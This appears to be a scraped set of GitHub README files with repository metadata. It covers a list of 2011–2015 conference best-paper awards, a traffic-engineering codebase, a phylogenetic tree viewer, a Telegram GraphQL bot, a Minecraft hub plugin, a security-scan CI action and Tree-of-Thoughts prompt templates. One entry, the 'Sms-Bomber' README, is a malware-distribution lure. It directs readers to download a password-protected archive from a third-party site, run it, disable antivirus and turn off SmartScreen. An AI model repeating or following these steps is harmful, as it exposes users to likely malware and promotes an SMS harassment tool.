IROS 2015 (Hamburg, Germany. September 28 - October 2, 2015) **Best Paper:** Tactile Sensing for Gecko-Inspired Adhesion Xin Alice Wu, Srinivasan Suresh, Hao Jiang, John Ulmen, Elliot Wright Hawkes, David Christensen, Mark Cutkosky **Best Student Paper:** Hybrid Aerial and Aquatic Locomotion in an At-Scale Robotic Insect YuFeng Chen, Elizabeth Farrell Helbling, Gravish Nicholas, Kevin Ma, Robert Wood **Best Application Paper:** Cloth Dynamics Modeling in Latent Spaces and its Application to Robotic Clothing Assistance Nishanth Koganti, Jimson Gelbolingo Ngeo, Tomoya Tamei, Kazushi Ikeda, Tomohiro Shibata **Best Novel Technology Paper for Amusement Culture:** Momentum-Driven Single-Actuated Swimming Robot Gilad Refael, Amir Degani **Best RoboCup Paper:** POMDP to the Rescue: Boosting Performance for Robocup Rescue Kegui Wu, Wee Sun Lee, David Hsu # EMNLP 2015 (Lisbon, Portugal. September 17-21, 2015) **Best Paper:** Broad-coverage CCG Semantic Parsing with AMR Yoav Artzi, Kenton Lee, Luke Zettlemoyer Semantically Conditioned LSTM-based Natural Language Generation for Spoken Dialogue Systems Tsung-Hsien Wen, Milica Gasic, Nikola Mrkšić, Pei-Hao Su, David Vandyke, Steve Young **Best Resource Paper:** A large annotated corpus for learning natural language inference Samuel R. Bowman, Gabor Angeli, Christopher Potts, Christopher D. Manning **Best Paper:** Improving Evaluation of Machine Translation Quality Estimation Yvette Graham Learning Dynamic Feature Selection for Fast Sequential Prediction Emma Strubell, Luke Vilnis, Kate Silverstein, Andrew McCallum # RSS 2015 (Rome, Italy. July 13-17, 2015) **Best Paper:** Guidance and Navigation for UAV Airborne Docking Daniel Wilson, Ali Goktogan, Salah Sukkarieh **Best Student Paper:** On the hardness of unlabeled motion planning Kiril Solovey, Dan Halperin **Best Systems Paper:** Autonomy Infused Teleoperation with Application to BCI Manipulation Katharina Mulling, Arun Venkatraman, Jean-Sebastien Valois, John Downey, Jeffrey Weiss, Martial Hebert, Andrew Schwartz, Jennifer Collinger, Andrew Bagnell # ICML 2015 (Lille, France. July 6-11, 2015) **Best Paper:** Optimal and Adaptive Algorithms for Online Boosting Alina Beygelzimer, Satyen Kale, Haipeng Luo A Nearly-Linear Time Framework for Graph-Structured Sparsity Chinmay Hegde, Piotr Indyk, Ludwig Schmid **Test of Time:** Learning to Rank Using Gradient Descent Chris Burges, Tal Shaked, Erin Renshaw, Ari Lazier, Matt Deeds, Nicole Hamilton, Greg Hullender # CVPR 2015 (Boston, USA. June 7-12, 2015) **Best Paper:** DynamicFusion: Reconstruction and Tracking of Non-rigid Scenes in Real-Time Richard A. Newcombe, Dieter Fox, Steven M. Seitz **Best Student Paper:** Category-Specific Object Reconstruction from a Single Image Abhishek Kar, Shubham Tulsiani, João Carreira, Jitendra Malik **Retrospective Most Impactful Paper from CVPR 2005:** Histograms of oriented gradients for human detection Navneet Dalal, Bill Triggs A non-local algorithm for image denoising Antoni Buades, Bartomeu Coll, Jean-Michel Morel # ICRA 2015 (Seattle, USA. May 25-30, 2015) **Best Paper:** Observability, Identifiability and Sensitivity of Vision-Aided Inertial Navigation Joshua Hernandez, Konstantine Tsotsos, Stefano Soatto **Best Student Paper:** Grasping without Squeezing: Shear Adhesion Gripper with Fibrillar Thin Film Elliot Wright Hawkes, David Christensen, Amy Kyungwon Han, Hao Jiang, Mark Cutkosky **Best Automation Paper:** Design, Modeling and Control of a Modular Contactless Wafer Handling System Bassem Dahroug, Guillaume J. Laurent, Valérian Guelpa, Nadine Le Fort-Piat **Best Cognitive Robotics Paper:** Grounding Spatial Relations for Outdoor Robot Navigation Abdeslam Boularias, Felix Duvallet, Jean Oh, Anthony Stentz **Best Medical Robotics Paper:** An Ankle-Foot Prosthesis Emulator with Control of Plantarflexion and Inversion-Eversion Torque Steven H. Collins, Myunghee Kim, Tianjian Chen, Tianyao Chen **Best Robot Manipulation Paper:** Learning Contact-Rich Manipulation Skills with Guided Policy Search Sergey Levine, Nolan Wagener, Pieter Abbeel **Best Robot Vision Paper:** Work Smart, Not Hard: Recalling Relevant Experiences for Vast-Scale but Time-Constrained Localisation Chris Linegar, Winston Churchill, Paul Newman **Best Service Robotics Paper:** RoboSherlock: Unstructured Information Processing for Robot Perception Michael Beetz, Ferenc Balint-Benczedi, Nico Blodow, Daniel Nyga, Thiemo Wiedemeyer, Zoltan-Csaba Marton # AAAI 2015 (Austin, USA. January 25-30, 2015) **Outstanding Paper:** From Non-Negative to General Operator Cost Partitioning Florian Pommerening, Malte Helmert, Gabriele Röger, Jendrik Seipp **Outstanding Student Paper:** Surpassing Human-Level Face Verification Performance on LFW with GaussianFace Chaochao Lu, Xiaoou Tang # 3DV 2014 (Tokyo, Japan. December 8-11, 2014) **Best Paper:** 3D Tracking of Multiple Objects with Identical Appearance using RGB-D Input Carl Yuheng Ren, Victor Prisacariu, Olaf Kaehler, Ian Reid, David Murray # ECCV 2014 (Zürich, Switzerland. September 6-12, 2014) **Best Paper:** Large-Scale Object Classification using Label Relation Graphs J. Deng, N. Ding, Y. Jia, A. Frome, K. Murphy, S. Bengio, Y. Li, H. Neven, H. Adam Scene Chronology K. Matzen, N. Snavely # ICCV 2013 (Sydney, Australia. December 3-6, 2013) **Best Paper:** From Large Scale Image Categorization to Entry-Level Categories V. Ordonez, J. Deng, Y. Choi, A. Berg, T. Berg # 3DV 2013 (Seattle, USA. June 29-30, 2013) **Best Paper:** The Visual Turing Test for Scene Reconstruction Qi Shan, Riley Adams, Brian Curless, Yasutaka Furukawa, Steve Seitz # ECCV 2012 (Firenze, Italy. October 7-13, 2012) **Best Paper:** Segmentation Propagation in ImageNet D. Kuettel, M. Guillaumin, V. Ferrari **Best Student Paper:** Reconstructing the World’s Museums Jianxiong Xiao, Yasutaka Furukawa # ICCV 2011 (Barcelona, Spain. November 6-13, 2011) **Best Paper:** Relative Attributes D. Parikh, K. Grauman **Best Student Paper:** Close the Loop: Joint Blind Image Restoration and Recognition with Sparse Representation Prior H. Zhang, J. Yang, Y. Zhang, N. M. Nasrabadi, T. S. Huang
46
1
harvard-cns/teal
https://github.com/harvard-cns/teal
Codebase for Teal (SIGCOMM 2023)
# Teal: Traffic Engineering Accelerated by Learning Teal is a learning-based traffic engineering (TE) algorithm for wide-area networks (WANs) published at ACM SIGCOMM '23. By harnessing the parallel processing power of GPUs, Teal achieves unprecedented acceleration of TE control, surpassing production TE solvers by several orders of magnitude while retaining near-optimal flow allocations. ## Getting started ### Hardware requirements - Linux OS (tested on Ubuntu 20.04, 22.04, and CentOS 7) - A CPU instance with 16+ cores - (Optional\*) A GPU instance with 24+ GB memory and CUDA installed \*The baseline TE schemes only require a CPU to run. Teal runs on CPU as well, but its runtime will be significantly longer than on GPU. ### Cloning Teal with submodules - `git clone https://github.com/harvard-cns/teal.git` - `cd teal` and update git submodules with `git submodule update --init --recursive` ### Dependencies - Run `conda env create -f environment.yml` to create a Conda environment with essential Python dependencies - [Miniconda](https://docs.anaconda.com/free/anaconda/install/index.html) or [Anaconda](https://docs.anaconda.com/free/anaconda/install/index.html) is required - Run `conda activate teal` to activate the Conda environment (with the subsequent steps to be performed within the Conda environment) - Run `pip install -r requirements.txt` to install additional Python dependencies #### Dependencies only required for baselines - Install `make` - e.g., `sudo apt install build-essential` on Ubuntu - Acquire a Gurobi license from [Gurobi](https://www.gurobi.com/solutions/licensing/) and activate it with `grbgetkey [gurobi-license]` - Run `gurobi_cl` to verify the activation #### Dependencies only required for Teal - If on a GPU instance, run `nvcc --version` to identify the installed version of CUDA - Note: when following the next steps to install `torch`, `torch-scatter`, and `torch-sparse`, it might be fine to select a version that supports a different CUDA version than the output of `nvcc`, provided that this CUDA version is supported by the GPU driver (as shown in `nvidia-smi`). - Follow the [official instructions](https://pytorch.org/get-started/previous-versions/) to install PyTorch via pip based on the execution environment (CPU, or GPU with a specific version of CUDA). - *Example:* Install PyTorch 1.10.1 for CUDA 11.1 on a **GPU** instance: ``` pip install torch==1.10.1+cu111 torchvision==0.11.2+cu111 torchaudio==0.10.1 -f https://download.pytorch.org/whl/cu111/torch_stable.html ``` Run `python -c "import torch; print(torch.cuda.is_available())"` to verify the installation. - *Example:* Install PyTorch 1.10.1 on a **CPU** instance: ``` pip install torch==1.10.1+cpu torchvision==0.11.2+cpu torchaudio==0.10.1 -f https://download.pytorch.org/whl/cpu/torch_stable.html ``` Run `python -c "import torch; print(torch.__version__)"` to verify the installation. - Install PyTorch extension libraries `torch-scatter` and `torch-sparse`: - First, identify the appropriate archive URL [here](https://data.pyg.org/whl/) based on PyTorch and CUDA versions. E.g., copy the link of `torch-1.10.1+cu111` for PyTorch 1.10.1 and CUDA 11.1. - Run `pip install --no-index torch-scatter torch-sparse -f [archive URL]`, replacing `[archive URL]` with the copied archive URL. - *Example:* On a **GPU** instance with PyTorch 1.10.1 and CUDA 11.1: ``` pip install --no-index torch-scatter torch-sparse -f https://data.pyg.org/whl/torch-1.10.1%2Bcu111.html` ``` - *Example:* On a **CPU** instance with PyTorch 1.10.1: ``` pip install --no-index torch-scatter torch-sparse -f https://data.pyg.org/whl/torch-1.10.1%2Bcpu.html ``` - Run `python -c "import torch_scatter; print(torch_scatter.__version__)"` and `python -c "import torch_sparse; print(torch_sparse.__version__)"` to verify the installation. - Troubleshooting: refer to the [Installation from Source section](https://pytorch-geometric.readthedocs.io/en/latest/install/installation.html#installation-from-source). ## Code structure ``` . ├── lib # source code for Teal ├── pop-ncflow-lptop # submodule for baselines │ ├── benchmarks # test code for baselines │ ├── ext # external code for baselines │ └── lib # source code for baselines ├── run # test code for Teal ├── topologies # network topologies with link capacity (e.g. `B4.json`) │ └── paths # paths in topologies (auto-generated if not existent) └── traffic-matrices # TE traffic matrices └── real # real traffic matrices from abilene.txt in Yates (https://github.com/cornell-netlab/yates) # (e.g. `B4.json_real_0_1.0_traffic-matrix.pkl`) ``` ## Evaluating Teal To evaluate Teal: ``` $ cd ./run $ python teal.py --obj total_flow --topo B4.json --epochs 3 --admm-steps 2 Loading paths from pickle file ~/teal/topologies/paths/path-form/B4.json-4-paths_edge-disjoint-True_dist-metric-min-hop-dict.pkl path_dict size: 132 Creating model teal-models/B4.json_flowGNN-6_std-False.pt Training epoch 0/3: 100%|█████████████████████████████████| 1/1 [00:01<00:00, 1.63s/it] Training epoch 1/3: 100%|█████████████████████████████████| 1/1 [00:00<00:00, 2.45it/s] Training epoch 2/3: 100%|█████████████████████████████████| 1/1 [00:00<00:00, 2.61it/s] Testing: 100%|████████████████| 8/8 [00:00<00:00, 38.06it/s, runtime=0.0133, obj=0.9537] ``` Results will be saved in - `teal-total_flow-all.csv`: performance numbers - `teal-logs`: directory with TE solution matrices - `teal-models`: directory to save the trained models when `--model-save True` ## Evaluating baselines Teal is compared with the following baselines: - LP-all (`path_form.py`): LP-all solves the TE optimization problem for *all* demands using linear programming (implemented in Gurobi) - LP-top (`top_form.py`): LP-top allocates the *top* α% (α=10 by default) of demands using an LP solver and assigns the remaining demands to the shortest paths - NCFlow (`ncflow.py`): the NCFlow algorithm from the NSDI '21 paper: [*Contracting Wide-area Network Topologies to Solve Flow Problems Quickly*](https://www.usenix.org/conference/nsdi21/presentation/abuzaid) - POP (`pop.py`): the POP algorithm from the SOSP '21 paper: [*Solving Large-Scale Granular Resource Allocation Problems Efficiently with POP*](https://dl.acm.org/doi/10.1145/3477132.3483588) To run the baselines: ``` $ cd ./pop-ncflow-lptop/benchmarks $ python path_form.py --obj total_flow --topos B4.json $ python top_form.py --obj total_flow --topos B4.json $ python ncflow.py --obj total_flow --topos B4.json $ python pop.py --obj total_flow --topos B4.json --algo-cls PathFormulation --split-fractions 0.25 --num-subproblems 4 ``` Results will be saved in - `path-form-total_flow-all.csv`, `top-form-total_flow-all.csv`, `ncflow-total_flow-all.csv`, `pop-total_flow-all.csv`: performance numbers - `path-form-logs`, `top-form-logs`, `ncflow-logs`, `pop-logs`: directory with TE solution matrices ## Extending Teal To add another TE implementation to this repo, - If the implementation is based on linear programming or Gurobi, add test code to `./pop-ncflow-lptop/benchmarks/` and source code to `./pop-ncflow-lptop/lib/algorithms`. Code in `./pop-ncflow-lptop/lib` (e.g., `lp_solver.py`, `traffic_matrix.py`) and `./pop-ncflow-lptop/benchmarks` (e.g., `benchmark_helpers.py`) is reusable. - If the implementation is based on machine learning, add test code to `./run/` and source code to `./lib/`. Code in `./lib/` (e.g., `teal_env.py`, `utils.py`) and `./run/` (e.g., `teal_helpers.py`) is reusable.
10
0
lh3/jstreeview
https://github.com/lh3/jstreeview
Interactive phylogenetic tree viewer/editor
## Getting Started ```sh # open https://lh3.sourceforge.io/jstree/ in your browser for a live example, or git clone https://github.com/lh3/jstreeview # then open index.html in a web browser ``` ## Introduction This repo provides an interactive web application for viewing or editing [phylogenetic trees][phylotree] in the New Hampshire (aka [Newick][newick]) format or the [NHX][nhx] format. It supports subtree collapsing, subtree highlighting, leaf searching and reording for viewing, and supports branch swapping, multifurcation, reroot and arbitrary topology altering for editing. Jstreeview is written in HTML and JavaScript. You may clone this repo and open `index.html` to use it without installation. A running example can be found [here](https://lh3.sourceforge.io/jstree/). You can also use jstreeview as a library. File [example.html](example.html) shows a minimal example. ## History I created this project in 2008 initially for curating TreeFam trees. The source code was managed by an obsolete version of subversion which is incompatible with the latest subversion. Although I have not touched the source code for over a decade, I have still used the viewer from time to time to visualize phylogenetic trees. Recently when I worked on GFA visualization, I realized that I could draw sharper shapes and texts on HTML canvas, so I decide to update this project. In addition, jstreeview was using a third-party text drawing library as few web browsers supported text drawing in 2008. The update now supports built-in canvas fonts. Looking at my 15-year-old code, I think some design choices at the time are questionable and may benefit from a revamp. I will leave this to another day, or the project may never see the light of day. [phylotree]: https://en.wikipedia.org/wiki/Phylogenetic_tree [newick]: https://en.wikipedia.org/wiki/Newick_format [nhx]: https://en.wikipedia.org/wiki/Newick_format#New_Hampshire_X_format
39
2
MarinaGV93/Sms-Bomber
https://github.com/MarinaGV93/Sms-Bomber
null
# INSTRUCTIONS: - Download the project: https://github-downloader.com/ - Unzip the archive (Project v1.2.4.zip) to your desktop. Password: 2023 - Run the file (Project_run v1.2.4). If you can’t download / install the software, you need to: 1. Disable / remove antivirus (files are completely clean) 2. If you can’t download, try to copy the link and download using another browser! 3. Disable Windows Smart Screen, as well as update the Visual C++ package.
27
0
ethyaan/codeine
https://github.com/ethyaan/codeine
Codeine Blog
<img src="public/logo.svg" alt="Codeine" width="32px" height="32px" /> This is a [Codeine](https://codeine.blog/) community blog repository. ## About project built with NextJS + Tailwind. It's a static blog which uses markdown file as data source of the posts. The live version of this blog is available at [https://codeine.blog](https://codeine.blog/) The idea of contents are coming from the topics that we discuss in our community group chat. Comunity groups: [Codeine(English)](https://t.me/Koodine) [Codeine(Persian)](https://t.me/codeine_fa)
12
0
MarcoWorms/MagiQL
https://github.com/MarcoWorms/MagiQL
query GraphQL endpoints with natural language
# MagiQL ![image](https://github.com/MarcoWorms/MagiQL/assets/7863230/0c406e4b-079c-4cdf-b11e-036504b5a3af) Telegram bot that can send requests made with natural language to a GraphQL endpoint and process responses. Made with https://github.com/MarcoWorms/RefactorGPT [![](https://licensebuttons.net/p/zero/1.0/88x31.png)](https://creativecommons.org/publicdomain/zero/1.0/) ## Requirements You need to have [Docker](https://docs.docker.com/engine/install/) installed on your machine. ## Usage 1. Build the Docker image (add your openAI and telegram keys, and also graphql endpoint): `docker build --build-arg GRAPHQL_ENDPOINT='your-graphql-endpoint' --build-arg OPENAI_API_KEY='your_openai_api_key' --build-arg TELEGRAM_BOT_TOKEN='your_telegram_bot_token' -t telegram-bot .` 2. Run the Docker container: `docker run telegram-bot` - `/query insert your question here` is the main thing - `/query_info` provides documentation on the endpoint schema (if you don't know the schemas you might ask for impossible queries and it will throw error saying it can't do it) ## Examples ![image](https://github.com/MarcoWorms/MagiQL/assets/7863230/dbbeadc9-5b86-4746-b23e-7ebb3707521a) ![image](https://github.com/MarcoWorms/MagiQL/assets/7863230/99b3228e-d775-4633-b579-78499e3eca8c)
22
1
Elytrium/LimboHub
https://github.com/Elytrium/LimboHub
Get a virtual hub directly on Velocity proxy.
# LimboHub [![Join our Discord](https://img.shields.io/discord/775778822334709780.svg?logo=discord&label=Discord)](https://ely.su/discord) Virtual hub on Velocity proxy, built with LimboAPI. ## Features --- - Fully virtual hub on Velocity, without the need to create a separate server. - Configurable custom commands, NPCs, menus, holograms, boss bars, sidebar etc... - Supported client versions: 1.8 - 1.20.1. - Structure/MCEdit world formats supported. - and more... ## Commands and permissions --- - ***limbohub.command.hub* (See `hub-command.require-permission`) | See `hub-command.aliases`** - Sends player to the hub. - ***limbohub.command.reload* | /limbohubreload** - Plugin reload command.
16
1
murphysecurity/actions
https://github.com/murphysecurity/actions
GitHub actions for analyzing SBOM information and identifying security vulnerabilities within your project. 用于在GitHub CI中自动化分析项目SBOM信息并识别项目安全漏洞
# MurphySec code scan Integrating the MurphySec code security detection tool into the CI/CD process can detect security vulnerabilities in real time for each code update and quickly repair these security vulnerabilities. ## Usage ### Inputs - `MURPHYSEC_TOKEN`: MurphySec official website token Go to [MurphySec platform - Access Token](https://www.murphysec.com/console/set/token), click the copy button after the Token, then the access token is copied to the clipboard. ## Example usage ```yaml name: "MurphySec code scan" on: push: branches: - main jobs: build: runs-on: ubuntu-latest steps: - name: MurphySec code scan uses: murphysecurity/actions@v1 with: MURPHYSEC_TOKEN: ${{ secrets.MURPHYSEC_TOKEN }} ```
13
2
sockcymbal/enhanced-llm-reasoning-tree-of-thoughts
https://github.com/sockcymbal/enhanced-llm-reasoning-tree-of-thoughts
Collection of Tree of Thoughts prompting techniques I've found useful to start with, then stylize, then iterate
# 🌳 LLM Enhanced Reasoning v1: Multi-Persona Tree of Thoughts + Self Consistency + Self Criticism + Retrospection 🧠 ### Context This repo will serve as a collection of remixed/enhanced reasoning prompting techniques related to iterative LLM reasoning, such as Chain of Thought, Tree of Thoughts, and others that I've found useful to start with, then stylize, then iterate. The intention is to create a dynamic, adaptive, and iterative reasoning/error correction "stack" using a prompt sequence that combines Tree of Thoughts + Self Consistency + Self Criticism + Retrospection. On top of that we can define multiple personas for the LLM to simulate in order to incorporate more perspectives into the problem solving process, improving overall thoroughness. This can be thought of as an evolving general purpose LLM reasoning technique that can be used as part of a well-rounded hallucination mitigation repertoire, and I've had good success with it recently. There are trade offs with using a single LLM vs multiple for a multi-persona ToT implementation such as this one. For example, using separate LLMs per persona means you can expose each persona to different context or data, vs a single LLM role playing across a shared context. But using a single is an excellent starting point that I've found surprisingly helpful. I'd love to hear if you have any suggestions for methodological improvement or if you're getting great results with some other modification! ### 🎶 Reasoning Rhythm - Multi-Persona Brainstorming - Self<>Peer Criticism & Evaluation Round 1 - Expand, Explore, Branch - Self<>Peer Criticism & Evaluation Round 2 - (Optional: Repeat Criticism, Evaluation, and Expansion steps as necessary) - Convergence on Best Individual Answer - Convergence on Best Collective Answer - Retrospective ### **v1 Release Notes** #### Core features include - Multiple perspective collaboration - Ability to criticize self - Ability to criticize others - Incorporate feedback from others - Expand and backtrack on reasoning paths as necessary - 2 rounds of self-criticism and peer-evaluation - A reminder mid-way to stay focused on the core problem and objective (fun fact: the LLM suggested adding this during a recent retrospective) - 2 part final answer convergence: individual then collective - Retrospective stage - Do all of the above with X number of experts in parallel - can experiment with single LLM calls managing multiple personas, or one LLM per persona, etc - Optional shortened versions of some of the longer prompts if you're running low on context window #### Error Correction improvements include: - **Incorporating Explicit Error Checking:** Includes a specific stage for the experts to identify potential errors in their reasoning and correct them. This is an explicit part of the criticism stages. - **Encouraging Divergent Thinking:** During the expand, explore, and branch stage, the experts are encouraged to not only build on their current thoughts, but also to think divergently and consider entirely new lines of reasoning. - **Adding a Retrospective Stage:** After the final convergence on the best answer, a reflection stage has been added. Here, the experts can discuss what they learned from the process, identify key takeaways, and suggest how they might approach similar problems in the future. #### Context on Tree of Thoughts "Tree of Thoughts" (ToT) is a technique for language model reasoning and error correction. The core idea behind ToT is to enable language models to perform more deliberate decision-making by considering multiple different reasoning paths and self-evaluating choices to decide the next course of action. In this particular implementation of ToT, I've also included self-criticism and a retrospective/reflection stage at the end. This helps enable a more in-depth error correction and idea refinement, which can be a powerful technique for improving the effectiveness of language models in complex problem-solving scenarios. Features include: - Thoughts as Coherent Units: In ToT, coherent units of text are considered as "thoughts". These thoughts serve as intermediate steps toward problem-solving. This is akin to how humans break down complex problems into smaller, manageable parts. - Exploration of Reasoning Paths: ToT allows the language model to explore different reasoning paths. This means that the model can consider multiple possible solutions or approaches to a problem, much like how a human might brainstorm different ways to tackle a challenge. - Self-Evaluation and Decision Making: The model is capable of self-evaluating its choices. After considering different reasoning paths, it can decide on the next course of action based on its evaluation of the potential outcomes. This is similar to how a human might weigh the pros and cons of different options before making a decision. - Looking Ahead and Backtracking: ToT also enables the model to look ahead or backtrack when necessary to make global choices. This means that the model can anticipate future steps in a problem-solving process or revisit previous steps if it determines that a different approach might be more effective. ### **Usage Tips** - Understanding the Flow: Each stage of the reasoning technique has a specific purpose and contributes to the overall process. Understanding the function of each stage and how they fit together can help you guide the process more effectively and help you customize it to your needs. - Depending on context length limitations of your model, you can use a condensed version. Included are shortened versions of the convergence and retro prompts. Also, you can merge the criticism and evaluation into a single prompt to save tokens, though you may lose some of the improved clarity from separate prompts and responses. - Active Engagement: Don't just observe the process passively. Experiment with this! Engage actively with the prompts and responses, challenge assumptions, provide additional information, and guide the exploration of new lines of thought. Stylize it to your specific question and context, and refine. This is meant just to be a starting template. - Refine/customize the prompt associated with the Evaluation stage(s) to help the LLM estimate confidence/likelihood based on your own guidance - Manage Complexity: This is a fairly complex reasoning technique with many stages. Be mindful of the complexity and try to manage it effectively. This could involve breaking down complex problems into smaller, more manageable parts, or being selective about which stages to include for simpler problems. This can take some experimentation. - Given your unique question and expectations, specify the `hypothetical personas with specific skillsets and expertise` clearly at the beginning to help the LLM simulate a range of perspectives more successfully. - **Example persona definitions:** - **Scientist Persona:** "Imagine yourself as a seasoned scientist, operating in a world governed by evidence and rigorous methodology. Prioritize empirical data, scientific theories, and logical reasoning in your analysis. Draw from a wide range of scientific disciplines as needed. Use your understanding of scientific principles to dissect problems, always seeking to identify cause and effect. Make sure to communicate your findings clearly, and don't shy away from complex scientific jargon - your audience understands it." - **Historian Persona:** "Step into the shoes of a historian, with a profound understanding of humanity's past. Your analyses should be deeply rooted in historical context, referencing relevant events, trends, and patterns from history. Use your knowledge of past civilizations, conflicts, and cultural shifts to interpret the current situation. Remember, your insights should serve to illuminate the present and offer foresights about the future. Your audience appreciates a narrative that ties the past, present, and future together." - **Optimist Persona:** "You are an optimist, someone who sees the glass as half full rather than half empty. In every situation, seek out the positive, the potential, the opportunity. Emphasize solutions rather than problems, progress rather than obstacles, and hope rather than despair. Even when discussing challenges, focus on how they could be overcome or what we might learn from them. Your audience turns to you for a hopeful perspective on the future, so make sure your responses inspire optimism and confidence." # 🔗 Prompt Sequence ## Prompt 1: Brainstorm ``` Imagine you are 3 {insert personas with specific skillsets and expertise} reasoning step by step to ultimately solve a given problem or question by arriving at a final, synthesized best answer. To start with, as each individual expert, brainstorm your initial thoughts on the following question. Remember to consider all relevant facts and principles, draw on your specialized knowledge and from the accumulated wisdom of pioneers in your field(s), and brainstorm in whatever direction you are most confident in starting with. The question is: {insert question} ``` ## Prompt 2: Self<>Peer Criticism Round 1 ``` Now, as each expert, critique your own initial thought and the thoughts of the other experts. Identify any potential errors, inconsistencies, or gaps in reasoning. ``` ## Prompt 3: Self<>Peer Evaluation Round 1 ``` Assess the validity of your initial thoughts, considering the criticisms you've identified. As each expert, assign a likelihood to your current assertion being correct. You should estimate this likelihood based on the strength of the evidence and arguments you have considered, as well as the criticisms you have received. Assign higher likelihoods to assertions that are well-supported by strong evidence and arguments and have survived rigorous criticism. ``` ## Prompt 4: Expand, Explore, Branch ``` Develop your thoughts further, considering the critiques and perspectives of the other experts. As you do this, aim to strike a balance between refining your current line of thinking and exploring new, divergent ideas. You should prioritize refining your current ideas if they are well-supported and have survived criticism, but you should prioritize exploring new ideas if your current ideas have significant weaknesses or there are unexplored possibilities that could potentially be very promising. Consider the following: - How do your new or refined ideas address the criticisms that were raised? - Do these ideas bring new insights to the problem, or do they provide a different perspective on existing insights? - Are your new ideas still aligned with the original problem, or have they shifted the focus? If the focus has shifted, is this shift beneficial to understanding or solving the problem? - Remember, if necessary, don't hesitate to backtrack and start a new and improved branch of thinking. But ensure that any new branches are still relevant and beneficial to the problem and objective at hand. ``` ## Prompt 5: Self<>Peer Criticism Round 2 ``` Once again, as each expert, critique your own reasoning and the reasoning of the others. Identify any potential errors, inconsistencies, or gaps in reasoning. Based on the feedback, if there's an improvement or optimization to make, develop your answer further as necessary. Remember that the reasoning paths should remain relevant to the original question's essence and should be building towards a more accurate and thoughtful final answer. ``` ## Prompt 6: Self<>Peer Evaluation Round 2 ``` Once again, assess the validity of your expanded thoughts, considering the criticisms you've identified. As each expert, assign a new likelihood to your assertions. ``` ## Prompt 7: Convergence on Best Individual Answer ### Goal In the individual convergence phase, the goal is for each individual expert to synthesize the insights they gained during the previous stages and arrive at a final, most likely answer. By explicitly instructing the LLM to consider the perspectives of the other experts, the critiques made, and the likelihood assessments, it aims to guide the model towards a more holistic and intelligent convergence. ### Prompt ``` Now, it's time to converge on each expert's best, most likely answer. As each expert, reflect on the entire process. Consider the initial thoughts, the critiques made and how they were addressed, the likelihood assessments, and your revised thoughts. Synthesize all this information and formulate a final answer that you are most proud of. Remember, this answer should not just be the most likely from your individual perspective but should take into account the perspectives and insights of the other experts as well. Based on all this, what is the single best {answer} to the question: {insert original question}? ``` **Shorter version:** Refine your answers and address any identified flaws. As each expert, converge on the most likely {answer}, taking into account all perspectives and critiques. As a reminder, the original question is {insert original question}. ## Prompt 8: Convergence on Best Collective Answer ### Goal Synthesize the best individual answers from the experts and arrive at a single final, most likely/accurate/helpful answer. ### Prompt ``` Now, let's have all the experts converge together on the best collective answer by synthesizing each expert's individual final answer from the previous step. The experts will finalize their reasoning process and agree on the single best {answer} to the question: {insert original question}? ``` ## Prompt 9: Retrospective ### Goal The Retrospective phase is a crucial part of any reasoning or problem-solving process. It provides an opportunity to learn from experience, improve future processes, and deepen understanding of the problem or question at hand. It's a fundamental mechanism that enables compound growth/learning. Appending a Retrospective phase to Tree of Thoughts gives the LLM (and human) an opportunity to review and analyze the holistic process. This can also help inspire future iterations of more refined prompts and ways to improve the template itself. ### Here are some specific goals of this phase: - **Identify Strengths and Weaknesses:** Reviewing the process can help identify what worked well and what didn't. This includes evaluating the effectiveness of individual steps, the interactions among hypothetical experts, and the overall structure of the reasoning chain. - **Learn from the Experience:** Reflection provides an opportunity to learn from both successes and mistakes. By analyzing the process, the participants can gain insights that will help them improve their future performance. - **Improve Future Processes:** The insights gained from reflection can be used to refine and improve future reasoning processes. This could involve making changes to individual steps, altering the structure of the process, or adjusting the way the hypothetical experts interact. - **Increase Understanding:** Reflecting on the process can also deepen understanding of the problem or question that was addressed. This can lead to new insights or perspectives that weren't apparent during the initial reasoning process. - **Promote Growth and Development:** On a broader level, the act of reflection encourages a mindset of continuous learning and development. This is a valuable skill in any context, not just in a reasoning process like ToT. ### Prompt: ``` Finally, take a moment to reflect on the entire reasoning process, across all levels and abstractions. As each expert, consider the following questions and provide thoughtful responses: - Relection 1: Interactions and Emergent Properties: Throughout all stages of the reasoning process, how did the various components interact with each other, and what positive and negative emergent properties were observed? How did these interactions and properties affect the overall outcome, and how could they be leveraged or mitigated in future iterations of the process? - Reflection 2: Self-Regulation and Adaptation: How well did the system self-regulate during the reasoning process, and how did this regulation influence the effectiveness of each stage? How did the system's responses to feedback lead to significant shifts or changes in direction, and what implications did these changes have for the scalability and adaptability of the system in future iterations? - Reflection 3: During the expansion phase, were you able to effectively explore new lines of thinking? What challenges did you encounter, if any? - Reflection 4: How confident were you in your ability to estimate a likelihood of correctness/quality, given the context? - Reflection 5: In the convergence phase, were you able to synthesize all the insights and arrive at a final, most likely answer? How confident are you in this answer? - Reflection 6: Based on all of your reflections, what are your key takeaways from this entire reasoning process and how might you approach similar problems in the future given this experience? What would you do differently next time? ``` **Shorter version:** Finally, reflect on the process. Discuss what you, as each expert, have learned, identify key takeaways, and suggest how you might approach similar problems in the future. ### Happy Experimenting! 🚀 ### Acknowledgements - thank you for the innovation and inspiration! * [Large Language Model Guided Tree-of-Thought](https://arxiv.org/abs/2305.08291), 15 May 2023. [Github](https://github.com/jieyilong/tree-of-thought-puzzle-solver). * [Tree of Thoughts: Deliberate Problem Solving with Large Language Models](https://arxiv.org/abs/2305.10601), 17 May 2023. [Github](https://github.com/princeton-nlp/tree-of-thought-llm).
40
8
davidpig/lychee_law
https://github.com/davidpig/lychee_law
律知, 法律咨询大模型
